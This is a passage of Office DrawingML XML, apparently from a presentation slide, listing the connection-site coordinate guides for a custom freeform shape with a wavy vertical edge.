              <a:gd name="connsiteX94" fmla="*/ 230789 w 1349253"/>
              <a:gd name="connsiteY94" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 222595 w 1349253"/>
              <a:gd name="connsiteY95" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 203773 w 1349253"/>
              <a:gd name="connsiteY96" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 180330 w 1349253"/>
              <a:gd name="connsiteY97" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 134129 w 1349253"/>
              <a:gd name="connsiteY98" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 106440 w 1349253"/>
              <a:gd name="connsiteY99" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 105566 w 1349253"/>
              <a:gd name="connsiteY100" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 86361 w 1349253"/>
              <a:gd name="connsiteY101" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 92183 w 1349253"/>
              <a:gd name="connsiteY102" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 78268 w 1349253"/>
              <a:gd name="connsiteY103" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 86575 w 1349253"/>
              <a:gd name="connsiteY104" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 87763 w 1349253"/>
              <a:gd name="connsiteY105" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 92448 w 1349253"/>
              <a:gd name="connsiteY106" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 84730 w 1349253"/>
              <a:gd name="connsiteY107" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 74036 w 1349253"/>
              <a:gd name="connsiteY108" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 62772 w 1349253"/>
              <a:gd name="connsiteY109" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 64228 w 1349253"/>
              <a:gd name="connsiteY110" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 75144 w 1349253"/>
              <a:gd name="connsiteY111" fmla="*/ 921368 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 59093 w 1349253"/>
              <a:gd name="connsiteY112" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 28501 w 1349253"/>
              <a:gd name="connsiteY113" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 7451 w 1349253"/>
              <a:gd name="connsiteY114" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 7009 w 1349253"/>
              <a:gd name="connsiteY115" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 16141 w 1349253"/>
              <a:gd name="connsiteY116" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 19 w 1349253"/>
              <a:gd name="connsiteY117" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 7093 w 1349253"/>
              <a:gd name="connsiteY118" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX119" fmla="*/ 11001 w 1349253"/>
              <a:gd name="connsiteY119" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 37125 w 1349253"/>
              <a:gd name="connsiteY120" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX121" fmla="*/ 36373 w 1349253"/>
              <a:gd name="connsiteY121" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX122" fmla="*/ 36203 w 1349253"/>
              <a:gd name="connsiteY122" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX123" fmla="*/ 41896 w 1349253"/>
              <a:gd name="connsiteY123" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX124" fmla="*/ 58923 w 1349253"/>
              <a:gd name="connsiteY124" fmla="*/ 212860 h 6858000"/>
              <a:gd name="connsiteX125" fmla="*/ 50633 w 1349253"/>
              <a:gd name="connsiteY125" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX126" fmla="*/ 62917 w 1349253"/>
              <a:gd name="connsiteY126" fmla="*/ 55288 h 6858000"/>
              <a:gd name="connsiteX127" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY127" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 85947 w 1349253"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 122540 w 1349253"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 134040 w 1349253"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 158779 w 1349253"/>
              <a:gd name="connsiteY6" fmla="*/ 6691589 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 150803 w 1349253"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 151427 w 1349253"/>
              <a:gd name="connsiteY8" fmla="*/ 6636211 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 168871 w 1349253"/>
              <a:gd name="connsiteY9" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 182911 w 1349253"/>
              <a:gd name="connsiteY10" fmla="*/ 6557575 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 235868 w 1349253"/>
              <a:gd name="connsiteY11" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 251555 w 1349253"/>
              <a:gd name="connsiteY12" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 295260 w 1349253"/>
              <a:gd name="connsiteY13" fmla="*/ 6379786 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 278483 w 1349253"/>
              <a:gd name="connsiteY14" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 255898 w 1349253"/>
              <a:gd name="connsiteY15" fmla="*/ 6313295 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 263062 w 1349253"/>
              <a:gd name="connsiteY16" fmla="*/ 6280046 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 266061 w 1349253"/>
              <a:gd name="connsiteY17" fmla="*/ 6272987 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 272835 w 1349253"/>
              <a:gd name="connsiteY18" fmla="*/ 6252834 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 250827 w 1349253"/>
              <a:gd name="connsiteY19" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 249625 w 1349253"/>
              <a:gd name="connsiteY20" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 265040 w 1349253"/>
              <a:gd name="connsiteY21" fmla="*/ 6078132 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 252427 w 1349253"/>
              <a:gd name="connsiteY22" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 237656 w 1349253"/>
              <a:gd name="connsiteY23" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 287168 w 1349253"/>
              <a:gd name="connsiteY24" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 316966 w 1349253"/>
              <a:gd name="connsiteY25" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 326089 w 1349253"/>
              <a:gd name="connsiteY26" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 352965 w 1349253"/>
              <a:gd name="connsiteY27" fmla="*/ 5437125 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 366533 w 1349253"/>
              <a:gd name="connsiteY28" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 382514 w 1349253"/>
              <a:gd name="connsiteY29" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 416007 w 1349253"/>
              <a:gd name="connsiteY30" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 425606 w 1349253"/>
              <a:gd name="connsiteY31" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 436832 w 1349253"/>
              <a:gd name="connsiteY32" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 437852 w 1349253"/>
              <a:gd name="connsiteY33" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 445193 w 1349253"/>
              <a:gd name="connsiteY34" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 448496 w 1349253"/>
              <a:gd name="connsiteY35" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 449480 w 1349253"/>
              <a:gd name="connsiteY36" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 445114 w 1349253"/>
              <a:gd name="connsiteY37" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 451791 w 1349253"/>
              <a:gd name="connsiteY38" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 448724 w 1349253"/>
              <a:gd name="connsiteY39" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 455554 w 1349253"/>
              <a:gd name="connsiteY40" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 462590 w 1349253"/>
              <a:gd name="connsiteY41" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 465321 w 1349253"/>
              <a:gd name="connsiteY42" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 462025 w 1349253"/>
              <a:gd name="connsiteY43" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 463579 w 1349253"/>
              <a:gd name="connsiteY44" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 470488 w 1349253"/>
              <a:gd name="connsiteY45" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 466344 w 1349253"/>
              <a:gd name="connsiteY46" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 481747 w 1349253"/>
              <a:gd name="connsiteY47" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 487650 w 1349253"/>
              <a:gd name="connsiteY48" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 492383 w 1349253"/>
              <a:gd name="connsiteY49" fmla="*/ 4780965 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 493676 w 1349253"/>
              <a:gd name="connsiteY50" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 491483 w 1349253"/>
              <a:gd name="connsiteY51" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 486963 w 1349253"/>
              <a:gd name="connsiteY52" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 482046 w 1349253"/>
              <a:gd name="connsiteY53" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 478611 w 1349253"/>
              <a:gd name="connsiteY54" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 459264 w 1349253"/>
              <a:gd name="connsiteY55" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 463337 w 1349253"/>
              <a:gd name="connsiteY56" fmla="*/ 4090296 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 448593 w 1349253"/>
              <a:gd name="connsiteY57" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 449742 w 1349253"/>
              <a:gd name="connsiteY58" fmla="*/ 4031933 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 448318 w 1349253"/>
              <a:gd name="connsiteY59" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 434613 w 1349253"/>
              <a:gd name="connsiteY60" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 429633 w 1349253"/>
              <a:gd name="connsiteY61" fmla="*/ 3933779 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 430964 w 1349253"/>
              <a:gd name="connsiteY62" fmla="*/ 3933093 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 435318 w 1349253"/>
              <a:gd name="connsiteY63" fmla="*/ 3922082 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 440396 w 1349253"/>
              <a:gd name="connsiteY64" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 462990 w 1349253"/>
              <a:gd name="connsiteY65" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 460248 w 1349253"/>
              <a:gd name="connsiteY66" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 461981 w 1349253"/>
              <a:gd name="connsiteY67" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 465724 w 1349253"/>
              <a:gd name="connsiteY68" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 465190 w 1349253"/>
              <a:gd name="connsiteY69" fmla="*/ 3767709 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 473886 w 1349253"/>
              <a:gd name="connsiteY70" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 481232 w 1349253"/>
              <a:gd name="connsiteY71" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 480528 w 1349253"/>
              <a:gd name="connsiteY72" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 483971 w 1349253"/>
              <a:gd name="connsiteY73" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 491509 w 1349253"/>
              <a:gd name="connsiteY74" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 493180 w 1349253"/>
              <a:gd name="connsiteY75" fmla="*/ 3307769 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 510743 w 1349253"/>
              <a:gd name="connsiteY76" fmla="*/ 3250522 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 511168 w 1349253"/>
              <a:gd name="connsiteY77" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 487927 w 1349253"/>
              <a:gd name="connsiteY78" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 473112 w 1349253"/>
              <a:gd name="connsiteY79" fmla="*/ 3129034 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 473777 w 1349253"/>
              <a:gd name="connsiteY80" fmla="*/ 3126682 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 451254 w 1349253"/>
              <a:gd name="connsiteY81" fmla="*/ 3106272 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 423984 w 1349253"/>
              <a:gd name="connsiteY82" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 381264 w 1349253"/>
              <a:gd name="connsiteY83" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 315516 w 1349253"/>
              <a:gd name="connsiteY84" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 286333 w 1349253"/>
              <a:gd name="connsiteY85" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 273294 w 1349253"/>
              <a:gd name="connsiteY86" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 279293 w 1349253"/>
              <a:gd name="connsiteY87" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 281905 w 1349253"/>
              <a:gd name="connsiteY88" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 258234 w 1349253"/>
              <a:gd name="connsiteY89" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 248121 w 1349253"/>
              <a:gd name="connsiteY90" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 232338 w 1349253"/>
              <a:gd name="connsiteY91" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 229796 w 1349253"/>
              <a:gd name="connsiteY92" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 230789 w 1349253"/>
              <a:gd name="connsiteY93" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 222595 w 1349253"/>
              <a:gd name="connsiteY94" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 203773 w 1349253"/>
              <a:gd name="connsiteY95" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 180330 w 1349253"/>
              <a:gd name="connsiteY96" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 134129 w 1349253"/>
              <a:gd name="connsiteY97" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 106440 w 1349253"/>
              <a:gd name="connsiteY98" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 105566 w 1349253"/>
              <a:gd name="connsiteY99" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 86361 w 1349253"/>
              <a:gd name="connsiteY100" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 92183 w 1349253"/>
              <a:gd name="connsiteY101" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 78268 w 1349253"/>
              <a:gd name="connsiteY102" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 86575 w 1349253"/>
              <a:gd name="connsiteY103" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 87763 w 1349253"/>
              <a:gd name="connsiteY104" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 92448 w 1349253"/>
              <a:gd name="connsiteY105" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 84730 w 1349253"/>
              <a:gd name="connsiteY106" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 74036 w 1349253"/>
              <a:gd name="connsiteY107" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 62772 w 1349253"/>
              <a:gd name="connsiteY108" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 64228 w 1349253"/>
              <a:gd name="connsiteY109" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 75144 w 1349253"/>
              <a:gd name="connsiteY110" fmla="*/ 921368 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 59093 w 1349253"/>
              <a:gd name="connsiteY111" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 28501 w 1349253"/>
              <a:gd name="connsiteY112" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 7451 w 1349253"/>
              <a:gd name="connsiteY113" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 7009 w 1349253"/>
              <a:gd name="connsiteY114" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 16141 w 1349253"/>
              <a:gd name="connsiteY115" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 19 w 1349253"/>
              <a:gd name="connsiteY116" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 7093 w 1349253"/>
              <a:gd name="connsiteY117" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 11001 w 1349253"/>
              <a:gd name="connsiteY118" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX119" fmla="*/ 37125 w 1349253"/>
              <a:gd name="connsiteY119" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 36373 w 1349253"/>
              <a:gd name="connsiteY120" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX121" fmla="*/ 36203 w 1349253"/>
              <a:gd name="connsiteY121" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX122" fmla="*/ 41896 w 1349253"/>
              <a:gd name="connsiteY122" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX123" fmla="*/ 58923 w 1349253"/>
              <a:gd name="connsiteY123" fmla="*/ 212860 h 6858000"/>
              <a:gd name="connsiteX124" fmla="*/ 50633 w 1349253"/>
              <a:gd name="connsiteY124" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX125" fmla="*/ 62917 w 1349253"/>
              <a:gd name="connsiteY125" fmla="*/ 55288 h 6858000"/>
              <a:gd name="connsiteX126" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY126" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 85947 w 1349253"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 122540 w 1349253"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 134040 w 1349253"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 158779 w 1349253"/>
              <a:gd name="connsiteY6" fmla="*/ 6691589 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 150803 w 1349253"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 151427 w 1349253"/>
              <a:gd name="connsiteY8" fmla="*/ 6636211 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 168871 w 1349253"/>
              <a:gd name="connsiteY9" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 182911 w 1349253"/>
              <a:gd name="connsiteY10" fmla="*/ 6557575 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 235868 w 1349253"/>
              <a:gd name="connsiteY11" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 251555 w 1349253"/>
              <a:gd name="connsiteY12" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 295260 w 1349253"/>
              <a:gd name="connsiteY13" fmla="*/ 6379786 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 278483 w 1349253"/>
              <a:gd name="connsiteY14" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 255898 w 1349253"/>
              <a:gd name="connsiteY15" fmla="*/ 6313295 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 263062 w 1349253"/>
              <a:gd name="connsiteY16" fmla="*/ 6280046 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 266061 w 1349253"/>
              <a:gd name="connsiteY17" fmla="*/ 6272987 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 272835 w 1349253"/>
              <a:gd name="connsiteY18" fmla="*/ 6252834 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 250827 w 1349253"/>
              <a:gd name="connsiteY19" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 249625 w 1349253"/>
              <a:gd name="connsiteY20" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 265040 w 1349253"/>
              <a:gd name="connsiteY21" fmla="*/ 6078132 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 252427 w 1349253"/>
              <a:gd name="connsiteY22" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 237656 w 1349253"/>
              <a:gd name="connsiteY23" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 287168 w 1349253"/>
              <a:gd name="connsiteY24" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 316966 w 1349253"/>
              <a:gd name="connsiteY25" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 326089 w 1349253"/>
              <a:gd name="connsiteY26" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 352965 w 1349253"/>
              <a:gd name="connsiteY27" fmla="*/ 5437125 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 366533 w 1349253"/>
              <a:gd name="connsiteY28" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 382514 w 1349253"/>
              <a:gd name="connsiteY29" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 416007 w 1349253"/>
              <a:gd name="connsiteY30" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 425606 w 1349253"/>
              <a:gd name="connsiteY31" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 436832 w 1349253"/>
              <a:gd name="connsiteY32" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 437852 w 1349253"/>
              <a:gd name="connsiteY33" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 445193 w 1349253"/>
              <a:gd name="connsiteY34" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 448496 w 1349253"/>
              <a:gd name="connsiteY35" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 449480 w 1349253"/>
              <a:gd name="connsiteY36" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 445114 w 1349253"/>
              <a:gd name="connsiteY37" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 451791 w 1349253"/>
              <a:gd name="connsiteY38" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 448724 w 1349253"/>
              <a:gd name="connsiteY39" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 455554 w 1349253"/>
              <a:gd name="connsiteY40" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 462590 w 1349253"/>
              <a:gd name="connsiteY41" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 465321 w 1349253"/>
              <a:gd name="connsiteY42" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 462025 w 1349253"/>
              <a:gd name="connsiteY43" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 463579 w 1349253"/>
              <a:gd name="connsiteY44" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 470488 w 1349253"/>
              <a:gd name="connsiteY45" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 466344 w 1349253"/>
              <a:gd name="connsiteY46" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 481747 w 1349253"/>
              <a:gd name="connsiteY47" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 487650 w 1349253"/>
              <a:gd name="connsiteY48" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 492383 w 1349253"/>
              <a:gd name="connsiteY49" fmla="*/ 4780965 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 493676 w 1349253"/>
